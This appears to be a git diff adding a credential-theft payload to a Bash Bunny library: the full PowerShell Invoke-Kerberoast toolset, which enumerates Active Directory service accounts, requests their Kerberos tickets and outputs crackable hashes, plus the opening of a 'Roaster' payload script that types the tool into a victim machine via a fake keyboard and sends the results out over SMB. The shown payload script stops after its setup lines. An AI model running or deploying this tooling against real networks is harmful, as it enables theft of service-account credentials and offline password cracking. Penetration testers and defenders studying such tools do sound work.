Required Dependencies: None
|
||||
|
||||
Credit to Tim Medin (@TimMedin) for the Kerberoasting concept and original toolset implementation (https://github.com/nidem/kerberoast).
|
||||
|
||||
Note: the primary method of use will be Invoke-Kerberoast with various targeting options.
|
||||
|
||||
#>
|
||||
|
||||
function Get-DomainSearcher {
|
||||
<#
|
||||
.SYNOPSIS
|
||||
|
||||
Helper used by various functions that builds a custom AD searcher object.
|
||||
|
||||
Author: Will Schroeder (@harmj0y)
|
||||
License: BSD 3-Clause
|
||||
Required Dependencies: Get-NetDomain
|
||||
|
||||
.DESCRIPTION
|
||||
|
||||
Takes a given domain and a number of customizations and returns a
|
||||
System.DirectoryServices.DirectorySearcher object. This function is used
|
||||
heavily by other LDAP/ADSI search function.
|
||||
|
||||
.PARAMETER Domain
|
||||
|
||||
Specifies the domain to use for the query, defaults to the current domain.
|
||||
|
||||
.PARAMETER LDAPFilter
|
||||
|
||||
Specifies an LDAP query string that is used to filter Active Directory objects.
|
||||
|
||||
.PARAMETER Properties
|
||||
|
||||
Specifies the properties of the output object to retrieve from the server.
|
||||
|
||||
.PARAMETER SearchBase
|
||||
|
||||
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
|
||||
Useful for OU queries.
|
||||
|
||||
.PARAMETER SearchBasePrefix
|
||||
|
||||
Specifies a prefix for the LDAP search string (i.e. "CN=Sites,CN=Configuration").
|
||||
|
||||
.PARAMETER Server
|
||||
|
||||
Specifies an Active Directory server (domain controller) to bind to for the search.
|
||||
|
||||
.PARAMETER SearchScope
|
||||
|
||||
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
|
||||
|
||||
.PARAMETER ResultPageSize
|
||||
|
||||
Specifies the PageSize to set for the LDAP searcher object.
|
||||
|
||||
.PARAMETER SecurityMasks
|
||||
|
||||
Specifies an option for examining security information of a directory object.
|
||||
One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
|
||||
|
||||
.PARAMETER Tombstone
|
||||
|
||||
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
|
||||
|
||||
.PARAMETER Credential
|
||||
|
||||
A [Management.Automation.PSCredential] object of alternate credentials
|
||||
for connection to the target domain.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
Get-DomainSearcher -Domain testlab.local
|
||||
|
||||
Return a searcher for all objects in testlab.local.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
Get-DomainSearcher -Domain testlab.local -LDAPFilter '(samAccountType=805306368)' -Properties 'SamAccountName,lastlogon'
|
||||
|
||||
Return a searcher for user objects in testlab.local and only return the SamAccountName and LastLogon properties.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
Get-DomainSearcher -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
|
||||
|
||||
Return a searcher that searches through the specific ADS/LDAP search base (i.e. OU).
|
||||
|
||||
.OUTPUTS
|
||||
|
||||
System.DirectoryServices.DirectorySearcher
|
||||
#>
|
||||
|
||||
[OutputType('System.DirectoryServices.DirectorySearcher')]
|
||||
[CmdletBinding()]
|
||||
Param(
|
||||
[Parameter(ValueFromPipeline = $True)]
|
||||
[ValidateNotNullOrEmpty()]
|
||||
[String]
|
||||
$Domain,
|
||||
|
||||
[ValidateNotNullOrEmpty()]
|
||||
[Alias('Filter')]
|
||||
[String]
|
||||
$LDAPFilter,
|
||||
|
||||
[ValidateNotNullOrEmpty()]
|
||||
[String[]]
|
||||
$Properties,
|
||||
|
||||
[ValidateNotNullOrEmpty()]
|
||||
[String]
|
||||
$SearchBase,
|
||||
|
||||
[ValidateNotNullOrEmpty()]
|
||||
[String]
|
||||
$SearchBasePrefix,
|
||||
|
||||
[ValidateNotNullOrEmpty()]
|
||||
[String]
|
||||
$Server,
|
||||
|
||||
[ValidateSet('Base', 'OneLevel', 'Subtree')]
|
||||
[String]
|
||||
$SearchScope = 'Subtree',
|
||||
|
||||
[ValidateRange(1,10000)]
|
||||
[Int]
|
||||
$ResultPageSize = 200,
|
||||
|
||||
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
|
||||
[String]
|
||||
$SecurityMasks,
|
||||
|
||||
[Switch]
|
||||
$Tombstone,
|
||||
|
||||
[Management.Automation.PSCredential]
|
||||
[Management.Automation.CredentialAttribute()]
|
||||
$Credential = [Management.Automation.PSCredential]::Empty
|
||||
)
|
||||
|
||||
PROCESS {
|
||||
|
||||
if ($Domain) {
|
||||
$TargetDomain = $Domain
|
||||
}
|
||||
else {
|
||||
$TargetDomain = (Get-NetDomain).name
|
||||
}
|
||||
|
||||
if ($Credential -eq [Management.Automation.PSCredential]::Empty) {
|
||||
if (-not $Server) {
|
||||
try {
|
||||
# if there's no -Server specified, try to pull the primary DC to bind to
|
||||
$BindServer = ((Get-NetDomain).PdcRoleOwner).Name
|
||||
}
|
||||
catch {
|
||||
throw 'Get-DomainSearcher: Error in retrieving PDC for current domain'
|
||||
}
|
||||
}
|
||||
}
|
||||
elseif (-not $Server) {
|
||||
try {
|
||||
$BindServer = ((Get-NetDomain -Credential $Credential).PdcRoleOwner).Name
|
||||
}
|
||||
catch {
|
||||
throw 'Get-DomainSearcher: Error in retrieving PDC for current domain'
|
||||
}
|
||||
}
|
||||
|
||||
$SearchString = 'LDAP://'
|
||||
|
||||
if ($BindServer) {
|
||||
$SearchString += $BindServer
|
||||
if ($TargetDomain) {
|
||||
$SearchString += '/'
|
||||
}
|
||||
}
|
||||
|
||||
if ($SearchBasePrefix) {
|
||||
$SearchString += $SearchBasePrefix + ','
|
||||
}
|
||||
|
||||
if ($SearchBase) {
|
||||
if ($SearchBase -Match '^GC://') {
|
||||
# if we're searching the global catalog, get the path in the right format
|
||||
$DN = $SearchBase.ToUpper().Trim('/')
|
||||
$SearchString = ''
|
||||
}
|
||||
else {
|
||||
if ($SearchBase -match '^LDAP://') {
|
||||
if ($SearchBase -match "LDAP://.+/.+") {
|
||||
$SearchString = ''
|
||||
}
|
||||
else {
|
||||
$DN = $SearchBase.Substring(7)
|
||||
}
|
||||
}
|
||||
else {
|
||||
$DN = $SearchBase
|
||||
}
|
||||
}
|
||||
}
|
||||
else {
|
||||
if ($TargetDomain -and ($TargetDomain.Trim() -ne '')) {
|
||||
$DN = "DC=$($TargetDomain.Replace('.', ',DC='))"
|
||||
}
|
||||
}
|
||||
|
||||
$SearchString += $DN
|
||||
Write-Verbose "Get-DomainSearcher search string: $SearchString"
|
||||
|
||||
if ($Credential -ne [Management.Automation.PSCredential]::Empty) {
|
||||
Write-Verbose "Using alternate credentials for LDAP connection"
|
||||
$DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password)
|
||||
$Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject)
|
||||
}
|
||||
else {
|
||||
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
|
||||
}
|
||||
|
||||
$Searcher.PageSize = $ResultPageSize
|
||||
$Searcher.SearchScope = $SearchScope
|
||||
$Searcher.CacheResults = $False
|
||||
|
||||
if ($Tombstone) {
|
||||
$Searcher.Tombstone = $True
|
||||
}
|
||||
|
||||
if ($LDAPFilter) {
|
||||
$Searcher.filter = $LDAPFilter
|
||||
}
|
||||
|
||||
if ($SecurityMasks) {
|
||||
$Searcher.SecurityMasks = Switch ($SecurityMasks) {
|
||||
'Dacl' { [System.DirectoryServices.SecurityMasks]::Dacl }
|
||||
'Group' { [System.DirectoryServices.SecurityMasks]::Group }
|
||||
'None' { [System.DirectoryServices.SecurityMasks]::None }
|
||||
'Owner' { [System.DirectoryServices.SecurityMasks]::Owner }
|
||||
'Sacl' { [System.DirectoryServices.SecurityMasks]::Sacl }
|
||||
}
|
||||
}
|
||||
|
||||
if ($Properties) {
|
||||
# handle an array of properties to load w/ the possibility of comma-separated strings
|
||||
$PropertiesToLoad = $Properties| ForEach-Object { $_.Split(',') }
|
||||
$Searcher.PropertiesToLoad.AddRange(($PropertiesToLoad))
|
||||
}
|
||||
|
||||
$Searcher
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
function Convert-LDAPProperty {
|
||||
<#
|
||||
.SYNOPSIS
|
||||
|
||||
Helper that converts specific LDAP property result fields and outputs
|
||||
a custom psobject.
|
||||
|
||||
Author: Will Schroeder (@harmj0y)
|
||||
License: BSD 3-Clause
|
||||
Required Dependencies: None
|
||||
|
||||
.DESCRIPTION
|
||||
|
||||
Converts a set of raw LDAP properties results from ADSI/LDAP searches
|
||||
into a proper PSObject. Used by several of the Get-Net* function.
|
||||
|
||||
.PARAMETER Properties
|
||||
|
||||
Properties object to extract out LDAP fields for display.
|
||||
|
||||
.OUTPUTS
|
||||
|
||||
System.Management.Automation.PSCustomObject
|
||||
|
||||
A custom PSObject with LDAP hashtable properties translated.
|
||||
#>
|
||||
|
||||
[OutputType('System.Management.Automation.PSCustomObject')]
|
||||
[CmdletBinding()]
|
||||
Param(
|
||||
[Parameter(Mandatory = $True, ValueFromPipeline = $True)]
|
||||
[ValidateNotNullOrEmpty()]
|
||||
$Properties
|
||||
)
|
||||
|
||||
$ObjectProperties = @{}
|
||||
|
||||
$Properties.PropertyNames | ForEach-Object {
|
||||
if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory')) {
|
||||
# convert the SID to a string
|
||||
$ObjectProperties[$_] = (New-Object System.Security.Principal.SecurityIdentifier($Properties[$_][0], 0)).Value
|
||||
}
|
||||
elseif ($_ -eq 'objectguid') {
|
||||
# convert the GUID to a string
|
||||
$ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid
|
||||
}
|
||||
elseif ($_ -eq 'ntsecuritydescriptor') {
|
||||
$ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0
|
||||
}
|
||||
elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) {
|
||||
# convert timestamps
|
||||
if ($Properties[$_][0] -is [System.MarshalByRefObject]) {
|
||||
# if we have a System.__ComObject
|
||||
$Temp = $Properties[$_][0]
|
||||
[Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)
|
||||
[Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)
|
||||
$ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low)))
|
||||
}
|
||||
else {
|
||||
# otherwise just a string
|
||||
$ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0])))
|
||||
}
|
||||
}
|
||||
elseif ($Properties[$_][0] -is [System.MarshalByRefObject]) {
|
||||
# try to convert misc com objects
|
||||
$Prop = $Properties[$_]
|
||||
try {
|
||||
$Temp = $Prop[$_][0]
|
||||
Write-Verbose $_
|
||||
[Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)
|
||||
[Int32]$Low = $Temp.GetType().InvokeMember('LowPart', [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)
|
||||
$ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low)
|
||||
}
|
||||
catch {
|
||||
$ObjectProperties[$_] = $Prop[$_]
|
||||
}
|
||||
}
|
||||
elseif ($Properties[$_].count -eq 1) {
|
||||
$ObjectProperties[$_] = $Properties[$_][0]
|
||||
}
|
||||
else {
|
||||
$ObjectProperties[$_] = $Properties[$_]
|
||||
}
|
||||
}
|
||||
|
||||
New-Object -TypeName PSObject -Property $ObjectProperties
|
||||
}
|
||||
|
||||
|
||||
function Get-NetDomain {
|
||||
<#
|
||||
.SYNOPSIS
|
||||
|
||||
Returns a given domain object.
|
||||
|
||||
Author: Will Schroeder (@harmj0y)
|
||||
License: BSD 3-Clause
|
||||
Required Dependencies: None
|
||||
|
||||
.DESCRIPTION
|
||||
|
||||
Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current
|
||||
domain or the domain specified with -Domain X.
|
||||
|
||||
.PARAMETER Domain
|
||||
|
||||
Specifies the domain name to query for, defaults to the current domain.
|
||||
|
||||
.PARAMETER Credential
|
||||
|
||||
A [Management.Automation.PSCredential] object of alternate credentials
|
||||
for connection to the target domain.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
Get-NetDomain -Domain testlab.local
|
||||
|
||||
.OUTPUTS
|
||||
|
||||
System.DirectoryServices.ActiveDirectory.Domain
|
||||
|
||||
.LINK
|
||||
|
||||
http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG
|
||||
#>
|
||||
|
||||
[OutputType('System.DirectoryServices.ActiveDirectory.Domain')]
|
||||
[CmdletBinding()]
|
||||
Param(
|
||||
[Parameter(Position = 0, ValueFromPipeline = $True)]
|
||||
[ValidateNotNullOrEmpty()]
|
||||
[String]
|
||||
$Domain,
|
||||
|
||||
[Management.Automation.PSCredential]
|
||||
[Management.Automation.CredentialAttribute()]
|
||||
$Credential = [Management.Automation.PSCredential]::Empty
|
||||
)
|
||||
|
||||
PROCESS {
|
||||
if ($Credential -ne [Management.Automation.PSCredential]::Empty) {
|
||||
|
||||
Write-Verbose "Using alternate credentials for Get-NetDomain"
|
||||
|
||||
if (-not $Domain) {
|
||||
# if no domain is supplied, extract the logon domain from the PSCredential passed
|
||||
$TargetDomain = $Credential.GetNetworkCredential().Domain
|
||||
Write-Verbose "Extracted domain '$Domain' from -Credential"
|
||||
}
|
||||
else {
|
||||
$TargetDomain = $Domain
|
||||
}
|
||||
|
||||
$DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $TargetDomain, $Credential.UserName, $Credential.GetNetworkCredential().Password)
|
||||
|
||||
try {
|
||||
[System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
|
||||
}
|
||||
catch {
|
||||
Write-Verbose "The specified domain does '$TargetDomain' not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid."
|
||||
$Null
|
||||
}
|
||||
}
|
||||
elseif ($Domain) {
|
||||
$DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain)
|
||||
try {
|
||||
[System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
|
||||
}
|
||||
catch {
|
||||
Write-Verbose "The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust."
|
||||
$Null
|
||||
}
|
||||
}
|
||||
else {
|
||||
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
function Get-SPNTicket {
|
||||
<#
|
||||
.SYNOPSIS
|
||||
|
||||
Request the kerberos ticket for a specified service principal name (SPN).
|
||||
|
||||
Author: @machosec, Will Schroeder (@harmj0y)
|
||||
License: BSD 3-Clause
|
||||
Required Dependencies: None
|
||||
|
||||
.DESCRIPTION
|
||||
|
||||
This function will either take one/more SPN strings, or one/more PowerView.User objects
|
||||
(the output from Get-NetUser) and will request a kerberos ticket for the given SPN
|
||||
using System.IdentityModel.Tokens.KerberosRequestorSecurityToken. The encrypted
|
||||
portion of the ticket is then extracted and output in either crackable John or Hashcat
|
||||
format (deafult of John).
|
||||
|
||||
.PARAMETER SPN
|
||||
|
||||
Specifies the service principal name to request the ticket for.
|
||||
|
||||
.PARAMETER User
|
||||
|
||||
Specifies a PowerView.User object (result of Get-NetUser) to request the ticket for.
|
||||
|
||||
.PARAMETER OutputFormat
|
||||
|
||||
Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
|
||||
Defaults to 'John'.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
Get-SPNTicket -SPN "HTTP/web.testlab.local"
|
||||
|
||||
Request a kerberos service ticket for the specified SPN.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
"HTTP/web1.testlab.local","HTTP/web2.testlab.local" | Get-SPNTicket
|
||||
|
||||
Request kerberos service tickets for all SPNs passed on the pipeline.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
Get-NetUser -SPN | Get-SPNTicket -OutputFormat Hashcat
|
||||
|
||||
Request kerberos service tickets for all users with non-null SPNs and output in Hashcat format.
|
||||
|
||||
.INPUTS
|
||||
|
||||
String
|
||||
|
||||
Accepts one or more SPN strings on the pipeline with the RawSPN parameter set.
|
||||
|
||||
.INPUTS
|
||||
|
||||
PowerView.User
|
||||
|
||||
Accepts one or more PowerView.User objects on the pipeline with the User parameter set.
|
||||
|
||||
.OUTPUTS
|
||||
|
||||
PowerView.SPNTicket
|
||||
|
||||
Outputs a custom object containing the SamAccountName, DistinguishedName, ServicePrincipalName, and encrypted ticket section.
|
||||
#>
|
||||
|
||||
[OutputType('PowerView.SPNTicket')]
|
||||
[CmdletBinding(DefaultParameterSetName='RawSPN')]
|
||||
Param (
|
||||
[Parameter(Position = 0, ParameterSetName = 'RawSPN', Mandatory = $True, ValueFromPipeline = $True)]
|
||||
[ValidatePattern('.*/.*')]
|
||||
[Alias('ServicePrincipalName')]
|
||||
[String[]]
|
||||
$SPN,
|
||||
|
||||
[Parameter(Position = 0, ParameterSetName = 'User', Mandatory = $True, ValueFromPipeline = $True)]
|
||||
[ValidateScript({ $_.PSObject.TypeNames[0] -eq 'PowerView.User' })]
|
||||
[Object[]]
|
||||
$User,
|
||||
|
||||
[Parameter(Position = 1)]
|
||||
[ValidateSet('John', 'Hashcat')]
|
||||
[Alias('Format')]
|
||||
[String]
|
||||
$OutputFormat = 'John'
|
||||
)
|
||||
|
||||
BEGIN {
|
||||
$Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')
|
||||
}
|
||||
|
||||
PROCESS {
|
||||
if ($PSBoundParameters['User']) {
|
||||
$TargetObject = $User
|
||||
}
|
||||
else {
|
||||
$TargetObject = $SPN
|
||||
}
|
||||
|
||||
ForEach ($Object in $TargetObject) {
|
||||
if ($PSBoundParameters['User']) {
|
||||
$UserSPN = $Object.ServicePrincipalName
|
||||
$SamAccountName = $Object.SamAccountName
|
||||
$DistinguishedName = $Object.DistinguishedName
|
||||
}
|
||||
else {
|
||||
$UserSPN = $Object
|
||||
$SamAccountName = $Null
|
||||
$DistinguishedName = $Null
|
||||
}
|
||||
|
||||
$Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $UserSPN
|
||||
$TicketByteStream = $Ticket.GetRequest()
|
||||
if ($TicketByteStream) {
|
||||
$TicketHexStream = [System.BitConverter]::ToString($TicketByteStream) -replace '-'
|
||||
[System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split 'A48201'
|
||||
$Parts.RemoveAt($Parts.Count - 1)
|
||||
$Hash = $Parts -join 'A48201'
|
||||
$Hash = $Hash.Insert(32, '$')
|
||||
|
||||
$Out = New-Object PSObject
|
||||
$Out | Add-Member Noteproperty 'SamAccountName' $SamAccountName
|
||||
$Out | Add-Member Noteproperty 'DistinguishedName' $DistinguishedName
|
||||
$Out | Add-Member Noteproperty 'ServicePrincipalName' $Ticket.ServicePrincipalName
|
||||
|
||||
if ($OutputFormat -match 'John') {
|
||||
$HashFormat = "`$krb5tgs`$unknown:$Hash"
|
||||
}
|
||||
else {
|
||||
# hashcat output format
|
||||
$HashFormat = '$krb5tgs$23$*ID#124_DISTINGUISHED NAME: CN=fakesvc,OU=Service,OU=Accounts,OU=EnterpriseObjects,DC=asdf,DC=pd,DC=fakedomain,DC=com SPN: F3514235-4C06-11D1-AB04-00D04FC2DCD2-GDCD/asdf.asdf.pd.fakedomain.com:50000 *' + $Hash
|
||||
}
|
||||
$Out | Add-Member Noteproperty 'Hash' $HashFormat
|
||||
|
||||
$Out.PSObject.TypeNames.Insert(0, 'PowerView.SPNTicket')
|
||||
|
||||
Write-Output $Out
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
function Invoke-Kerberoast {
|
||||
<#
|
||||
.SYNOPSIS
|
||||
|
||||
Requests service tickets for kerberoast-able accounts and returns extracted ticket hashes.
|
||||
|
||||
Author: Will Schroeder (@harmj0y), @machosec
|
||||
License: BSD 3-Clause
|
||||
Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Get-SPNTicket
|
||||
|
||||
.DESCRIPTION
|
||||
|
||||
Implements code from Get-NetUser to quyery for user accounts with non-null service principle
|
||||
names (SPNs) and uses Get-SPNTicket to request/extract the crackable ticket information.
|
||||
The ticket format can be specified with -OutputFormat <John/Hashcat>
|
||||
|
||||
.PARAMETER Identity
|
||||
|
||||
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
|
||||
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
|
||||
Wildcards accepted. By default all accounts will be queried for non-null SPNs.
|
||||
|
||||
.PARAMETER AdminCount
|
||||
|
||||
Switch. Return users with adminCount=1.
|
||||
|
||||
.PARAMETER Domain
|
||||
|
||||
Specifies the domain to use for the query, defaults to the current domain.
|
||||
|
||||
.PARAMETER LDAPFilter
|
||||
|
||||
Specifies an LDAP query string that is used to filter Active Directory objects.
|
||||
|
||||
.PARAMETER SearchBase
|
||||
|
||||
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
|
||||
Useful for OU queries.
|
||||
|
||||
.PARAMETER Server
|
||||
|
||||
Specifies an Active Directory server (domain controller) to bind to.
|
||||
|
||||
.PARAMETER SearchScope
|
||||
|
||||
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
|
||||
|
||||
.PARAMETER ResultPageSize
|
||||
|
||||
Specifies the PageSize to set for the LDAP searcher object.
|
||||
|
||||
.PARAMETER Credential
|
||||
|
||||
A [Management.Automation.PSCredential] object of alternate credentials
|
||||
for connection to the target domain.
|
||||
|
||||
.PARAMETER OutputFormat
|
||||
|
||||
Either 'John' for John the Ripper style hash formatting, or 'Hashcat' for Hashcat format.
|
||||
Defaults to 'John'.
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
Invoke-Kerberoast | fl
|
||||
|
||||
SamAccountName : SQLService
|
||||
DistinguishedName : CN=SQLService,CN=Users,DC=testlab,DC=local
|
||||
ServicePrincipalName : MSSQLSvc/PRIMARY.testlab.local:1433
|
||||
Hash : $krb5tgs$unknown:30FFC786BECD0E88992CBBB017155C53$0343A9C8...
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
Invoke-Kerberoast -Domain dev.testlab.local | ConvertTo-CSV -NoTypeInformation
|
||||
|
||||
"SamAccountName","DistinguishedName","ServicePrincipalName","Hash"
|
||||
"SQLSVC","CN=SQLSVC,CN=Users,DC=dev,DC=testlab,DC=local","MSSQLSvc/secondary.dev.testlab.local:1433","$krb5tgs$unknown:ECF4BDD1037D1D9E2E091ABBDC92F00E$0F3A4...
|
||||
|
||||
.EXAMPLE
|
||||
|
||||
Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | fl
|
||||
|
||||
SamAccountName : SQLService
|
||||
DistinguishedName : CN=SQLService,CN=Users,DC=testlab,DC=local
|
||||
ServicePrincipalName : MSSQLSvc/PRIMARY.testlab.local:1433
|
||||
Hash : $krb5tgs$23$*ID#124_DISTINGUISHED NAME: CN=fakesvc,OU=Se
|
||||
rvice,OU=Accounts,OU=EnterpriseObjects,DC=proddfs,DC=pf,
|
||||
DC=fakedomain,DC=com SPN: H3514235-4C06-12D1-AB04-00D04F
|
||||
C2DCD2-GDCD/asdf.asdf.pd.fakedomain.com:50000 *30
|
||||
FFC786BECD0E88992CBBB017155C53$0343A9C8A7EB90F059CD92B52
|
||||
....
|
||||
|
||||
.INPUTS
|
||||
|
||||
String
|
||||
|
||||
Accepts one or more SPN strings on the pipeline with the RawSPN parameter set.
|
||||
|
||||
.OUTPUTS
|
||||
|
||||
PowerView.SPNTicket
|
||||
|
||||
Outputs a custom object containing the SamAccountName, DistinguishedName, ServicePrincipalName, and encrypted ticket section.
|
||||
#>
|
||||
|
||||
[OutputType('PowerView.SPNTicket')]
|
||||
[CmdletBinding()]
|
||||
Param(
|
||||
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
|
||||
[Alias('SamAccountName', 'Name')]
|
||||
[String[]]
|
||||
$Identity,
|
||||
|
||||
[Switch]
|
||||
$AdminCount,
|
||||
|
||||
[ValidateNotNullOrEmpty()]
|
||||
[String]
|
||||
$Domain,
|
||||
|
||||
[ValidateNotNullOrEmpty()]
|
||||
[Alias('Filter')]
|
||||
[String]
|
||||
$LDAPFilter,
|
||||
|
||||
[ValidateNotNullOrEmpty()]
|
||||
[String]
|
||||
$SearchBase,
|
||||
|
||||
[ValidateNotNullOrEmpty()]
|
||||
[String]
|
||||
$Server,
|
||||
|
||||
[ValidateSet('Base', 'OneLevel', 'Subtree')]
|
||||
[String]
|
||||
$SearchScope = 'Subtree',
|
||||
|
||||
[ValidateRange(1,10000)]
|
||||
[Int]
|
||||
$ResultPageSize = 200,
|
||||
|
||||
[Management.Automation.PSCredential]
|
||||
[Management.Automation.CredentialAttribute()]
|
||||
$Credential = [Management.Automation.PSCredential]::Empty,
|
||||
|
||||
[ValidateSet('John', 'Hashcat')]
|
||||
[Alias('Format')]
|
||||
[String]
|
||||
$OutputFormat = 'John'
|
||||
)
|
||||
|
||||
BEGIN {
|
||||
$SearcherArguments = @{}
|
||||
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
|
||||
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
|
||||
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
|
||||
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
|
||||
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
|
||||
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
|
||||
$UserSearcher = Get-DomainSearcher @SearcherArguments
|
||||
|
||||
$GetSPNTicketArguments = @{}
|
||||
if ($PSBoundParameters['OutputFormat']) { $GetSPNTicketArguments['OutputFormat'] = $OutputFormat }
|
||||
|
||||
}
|
||||
|
||||
PROCESS {
|
||||
if ($UserSearcher) {
|
||||
$IdentityFilter = ''
|
||||
$Filter = ''
|
||||
$Identity | Where-Object {$_} | ForEach-Object {
|
||||
$IdentityInstance = $_
|
||||
if ($IdentityInstance -match '^S-1-.*') {
|
||||
$IdentityFilter += "(objectsid=$IdentityInstance)"
|
||||
}
|
||||
elseif ($IdentityInstance -match '^CN=.*') {
|
||||
$IdentityFilter += "(distinguishedname=$IdentityInstance)"
|
||||
}
|
||||
else {
|
||||
try {
|
||||
$Null = [System.Guid]::Parse($IdentityInstance)
|
||||
$IdentityFilter += "(objectguid=$IdentityInstance)"
|
||||
}
|
||||
catch {
|
||||
$IdentityFilter += "(samAccountName=$IdentityInstance)"
|
||||
}
|
||||
}
|
||||
}
|
||||
if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
|
||||
$Filter += "(|$IdentityFilter)"
|
||||
}
|
||||
$Filter += '(servicePrincipalName=*)'
|
||||
|
||||
if ($PSBoundParameters['AdminCount']) {
|
||||
Write-Verbose 'Searching for adminCount=1'
|
||||
$Filter += '(admincount=1)'
|
||||
}
|
||||
if ($PSBoundParameters['LDAPFilter']) {
|
||||
Write-Verbose "Using additional LDAP filter: $LDAPFilter"
|
||||
$Filter += "$LDAPFilter"
|
||||
}
|
||||
|
||||
$UserSearcher.filter = "(&(samAccountType=805306368)$Filter)"
|
||||
Write-Verbose "Invoke-Kerberoast search filter string: $($UserSearcher.filter)"
|
||||
|
||||
$Results = $UserSearcher.FindAll()
|
||||
$Results | Where-Object {$_} | ForEach-Object {
|
||||
$User = Convert-LDAPProperty -Properties $_.Properties
|
||||
$User.PSObject.TypeNames.Insert(0, 'PowerView.User')
|
||||
$User
|
||||
} | Where-Object {$_.SamAccountName -notmatch 'krbtgt'} | Get-SPNTicket @GetSPNTicketArguments
|
||||
|
||||
$Results.dispose()
|
||||
$UserSearcher.dispose()
|
||||
}
|
||||
}
|
||||
}
|
||||
66
payloads/library/credentials/Roaster/payload.txt
Normal file
66
payloads/library/credentials/Roaster/payload.txt
Normal file
@@ -0,0 +1,66 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Roaster
|
||||
# Author: golem445
|
||||
# Version: 1.0
|
||||
# Attack Modes: RNDIS_ETHERNET, HID
|
||||
# Dependencies: impacket, gohttp
|
||||
# Runtime: ~10 seconds
|
||||
# Description:
|
||||
# Sets up Ethernet and HID keyboard interfaces simultaneously,
|
||||
# then uses HID to import Invoke-Kerberoast into memory via
|
||||
# Bash Bunny web server and execute the attack. Results are
|
||||
# exported to the loot directory via SMB.
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Yellow Blink: Attacking
|
||||
# White Blink: Clean up
|
||||
# Green: Attack Finished
|
||||
|
||||
### Prep for attack ###
|
||||
LED SETUP
|
||||
REQUIRETOOL impacket gohttp
|
||||
GET SWITCH_POSITION
|
||||
|
||||
# Temporary loot directory
|
||||
mkdir -p /loot/smb/
|
||||
|
||||
# Permanent loot directory
|
||||
mkdir -p /root/udisk/loot/roaster_exfil/
|
||||
|
||||
# Set interfaces
|
||||
